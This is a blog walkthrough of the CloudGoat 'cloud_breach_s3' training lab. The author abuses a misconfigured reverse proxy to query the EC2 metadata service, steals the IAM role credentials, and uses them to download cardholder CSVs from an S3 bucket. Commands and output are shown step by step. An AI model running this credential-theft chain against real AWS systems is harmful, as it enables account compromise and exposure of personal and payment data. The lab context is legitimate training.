CloudGoat: cloud_breach_s3

0xLeeBai
3 min readMay 10, 2024

--

Note:

  • We will be performing our attack via Kali Linux
  • Ensure you have done the pre-requisites before you start the lab

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create cloud_breach_s3

2. Enumerate the IP address

2.1 Nmap

┌──(root㉿kali)-[/opt/cloudgoat]
└─# nmap -p- -sV 3.91.223.35 --min-rate=1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 21:22 EDT
Nmap scan report for xxxx.compute-1.amazonaws.com (3.91.223.35)
Host is up (0.000090s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
80/tcp open tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.04 seconds

┌──(root㉿kali)-[/opt/cloudgoat]
└─#

2.2 HTTP

┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35
<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>
┌──(root㉿kali)-[/opt/cloudgoat]
└─#
┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35 -H host:169.254.169.254
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15
2022-07-09
2022-09-24
2024-04-11
latest
┌──(root㉿kali)-[/opt/cloudgoat]
└─#
┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest -H host:169.254.169.254
dynamic
meta-data
user-data
┌──(root㉿kali)-[/opt/cloudgoat]
└─#
┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data -H host:169.254.169.254
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
system
┌──(root㉿kali)-[/opt/cloudgoat]
└─#
┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data/iam -H host:169.254.169.254
info
security-credentials/
┌──(root㉿kali)-[/opt/cloudgoat]
└─#
┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data/iam/security-credentials -H host:169.254.169.254
cg-banking-WAF-Role-cloud_breach_s3_cgidtgnnrs1qrc
┌──(root㉿kali)-[/opt/cloudgoat]
└─#
┌──(root㉿kali)-[/opt/cloudgoat]
└─# curl http://3.91.223.35/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidtgnnrs1qrc -H host:169.254.169.254
{
"Code" : "Success",
"LastUpdated" : "2024-05-10T01:13:54Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxaaa",
"SecretAccessKey" : "xxxbbb",
"Token" : "xxxccc",
"Expiration" : "2024-05-10T07:49:07Z"
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─#

2.3 Create profile

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile s3new01
AWS Access Key ID [None]: xxxaaa
AWS Secret Access Key [None]: xxxbbb
Default region name [None]:
Default output format [None]:

┌──(root㉿kali)-[/opt/cloudgoat]
└─#
┌──(root㉿kali)-[/opt/cloudgoat]
└─# mousepad ~/.aws/credentials
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat ~/.aws/credentials
[CloudGoat]
... ... ...
[s3new01]
aws_access_key_id = xxxaaa
aws_secret_access_key = xxxbbb
aws_session_token = xxxccc

┌──(root㉿kali)-[/opt/cloudgoat]
└─#

3. Enumerate the S3 bucket

3.1 List all user owned s3 buckets

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws s3 ls --profile s3new01
2024-05-09 21:13:42 cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc

┌──(root㉿kali)-[/opt/cloudgoat]
└─#

3.2 List all prefixes and objects in a bucket

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws s3 ls s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc --profile s3new01
2024-05-09 21:13:47 58872 cardholder_data_primary.csv
2024-05-09 21:13:48 59384 cardholder_data_secondary.csv
2024-05-09 21:13:48 92165 cardholders_corporate.csv
2024-05-09 21:13:49 249500 goat.png

┌──(root㉿kali)-[/opt/cloudgoat]
└─#

3.3 Recursively copy S3 object to another location locally

┌──(root㉿kali)-[/opt/cloudgoat]
└─# mkdir s3_dump

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws s3 cp --recursive 's3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc' s3_dump/ --profile s3new01
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholder_data_secondary.csv to s3_dump/cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholder_data_primary.csv to s3_dump/cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholders_corporate.csv to s3_dump/cardholders_corporate.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/goat.png to s3_dump/goat.png

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd s3_dump

┌──(root㉿kali)-[/opt/cloudgoat/s3_dump]
└─# ls
cardholder_data_primary.csv cardholder_data_secondary.csv cardholders_corporate.csv goat.png

┌──(root㉿kali)-[/opt/cloudgoat/s3_dump]
└─# cat cardholder_data_primary.csv
ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip
287-43-8531,1,Cooper,Luffman,cluffman0@nifty.com,Male,194.222.101.195,2 Killdeer Way,Atlanta,Georgia,30343
892-80-0931,2,Grata,Pulteneye,gpulteneye1@taobao.com,Female,161.4.88.129,486 Butterfield Crossing,Washington,District of Columbia,20503
502-50-6643,3,Rogerio,Glover,rglover2@nps.gov,Male,88.58.129.152,3 Granby Circle,Sacramento,California,94280

4. Clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy cloud_breach_s3
┌──(root㉿kali)-[/opt/cloudgoat]
└─# rm -r s3_dump

┌──(root㉿kali)-[/opt/cloudgoat]
└─#

--

--

0xLeeBai
0xLeeBai

Written by 0xLeeBai

床前明月光,疑是地上霜。 举头望明月,低头思故乡。